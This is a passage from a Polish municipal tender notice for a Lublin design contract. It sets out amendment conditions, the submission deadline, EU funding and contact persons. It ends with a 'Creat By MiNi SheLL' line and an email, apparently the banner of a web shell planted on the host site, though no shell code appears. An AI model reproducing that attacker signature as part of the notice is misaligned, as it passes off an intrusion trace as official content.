b)	wystąpienia niezależnego od Wykonawcy przedłużania się pozyskiwania 	uzgodnień, sprawdzeń i warunków do projektowania od dysponentów 	mediów, ZUDP i innych właściwych organów czy instytucji oraz przedłużania 	się pozyskiwania wszelkich decyzji, opinii, niezbędnych do otrzymania 	koniecznych uzgodnień i pozwolenia na budowę,     
c) realizacji w drodze odrębnej umowy  prac powiązanych z przedmiotem 	niniejszej umowy, wymuszającej konieczność skoordynowania prac i 	uwzględnienia wzajemnych powiązań,
d) konieczności zmniejszenia zakresu przedmiotu umowy, gdy jego wykonanie 	w pierwotnym zakresie nie leży w interesie publicznym lub w przypadku 	wystąpienia  wystąpienia następujących okoliczności - obiekt należy zaprojektować tak by uzyskać najlepsze efekty pod względem funkcjonalności obiektu i jego reprezentacyjnego charakteru, z zastosowaniem nowoczesnych rozwiązań technicznych i technologicznych, materiałowych i systemowych. Przyjęte rozwiązania projektowe muszą spełniać wszelkie wymagania ustawowe, w szczególności z zakresu bezpieczeństwa pożarowego i użytkowania obiektu przez osoby o różnej niepełnosprawności i ograniczeniach, a także zasad uniwersalnego projektowania, zmniejszenia kosztów eksploatacji oraz nakładów na realizację inwestycji.
e) gdy zachowanie pierwotnego terminu nie leży w interesie publicznym,
f) przekroczenia terminów określonych w umowie, z przyczyn 	leżących po stronie Zamawiającego lub niezależnych od Stron niniejszej umowy,
3) zmianę wysokości wynagrodzenia należnego Wykonawcy, w przypadku 	zmiany: 
	a)	stawki podatku od towarów i usług,
b) wysokości minimalnego wynagrodzenia za pracę ustalonego na 	podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o 	minimalnym wynagrodzeniu za pracę (Dz. U. nr 200, poz. 1679, z 2004 r. 	Nr 240, poz. 2407 oraz z 2005 r. nr 157, poz.1314),
c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu 	zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne 	lub 	zdrowotne. 
2.	Zmiany umowy przewidziane w ust. 1 dopuszczalne są na następujących 	warunkach:
- ad pkt. 1 ppkt. 1) - zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu publicznego lub w zakresie wynikającym z ograniczenia środków pochodzących z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Infrastruktura i Środowisko 2014-2020, które miały być 	przeznaczone na dofinansowanie przedmiotu umowy, z jednoczesnym proporcjonalnym do zmniejszonego zakresu zamówienia (do wartości 	zaniechanych prac projektowych i nadzorów), zmniejszeniem wynagrodzenia określonego kwotą ryczałtową; wysokość ostatecznego, 	zmniejszonego wynagrodzenia zostanie ustalona na podstawie wyliczenia procentowego udziału zmniejszonego zakresu zamówienia w pierwotnie przyjętym zakresie, co zostanie potwierdzone przez obie Strony umowy 	stosownym protokołem,     
- ad pkt. 1 ppkt. 2) - zmiana terminu realizacji przedmiotu umowy nastąpi:
lit. a) o okres niezbędny do usunięcia skutków działania siły wyższej,
lit. b) o najdłuższy okres czasu przez jaki okoliczności te wystąpiły, powyżej 10 dni roboczych,
lit. c) o okres czasu niezbędny do wykonania prac powiązanych z przedmiotem  niniejszej umowy, realizowanych w drodze odrębnej umowy,
lit. d) o okres niezbędny do wykonania pozostałego zakresu zamówienia (proporcjonalnie do zmniejszonego zakresu),
lit. e) o okres umożliwiający Zamawiającemu osiągnięcie korzyści, stanowiących podstawę zmiany terminu realizacji, 
lit. f)  o najdłuższy okres czasu przez jaki okoliczności te wystąpiły.
- ad pkt. 1 ppkt. 3) -  zmiana wysokości wynagrodzenia należnego Wykonawcy: 
lit. a)	stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę stawki podatku VAT i pod warunkiem wykazania przez Wykonawcę, że zmiana ta będzie miała wpływ na koszty wykonania zamówienia wraz z pełnym uzasadnieniem, z zastrzeżeniem, że Zamawiającemu będzie przysługiwać prawo żądania dalszych wyjaśnień wraz z przedstawieniem dalszych dokumentów celem stwierdzenia dopuszczalności zmian wynagrodzenia, 
lit. b) - c) pod warunkiem wykazania przez Wykonawcę, że zmiany te będą miały wpływ na koszty wykonania zamówienia wraz z pełnym uzasadnieniem, z zastrzeżeniem, że Zamawiającemu będzie przysługiwać prawo żądania dalszych wyjaśnień wraz z przedstawieniem dalszych dokumentów celem stwierdzenia dopuszczalności zmian wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych UM Lublin, Plac Litewski 1, pokój nr 7, po dokonaniu wpłaty 35,00 zł w kasie UM Lublin, ul. Wieniawska 14 lub za zaliczeniem pocztowym (35,00 zł + koszt przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2016 godzina 11:30, miejsce: Biuro Zamówień Publicznych UM Lublin, Plac Litewski 1, pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający informuje, iż zadanie planowane do współfinansowania ze środków pochodzących z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Infrastruktura i Środowisko 2014-2020.
2. Osobami upoważnionymi do kontaktowania się z wykonawcami są:
2.1. W zakresie przedmiotu zamówienia: p. Marzena Jonak - Wydział Inwestycji i Remontów Urzędu Miasta Lublin, ul.  Podwale 3a, pokój nr 232, telefon 81 466 24 32.
2.2. W zakresie procedury: p. Radosław Antoń - Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 7, telefon 81 466 30 20..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com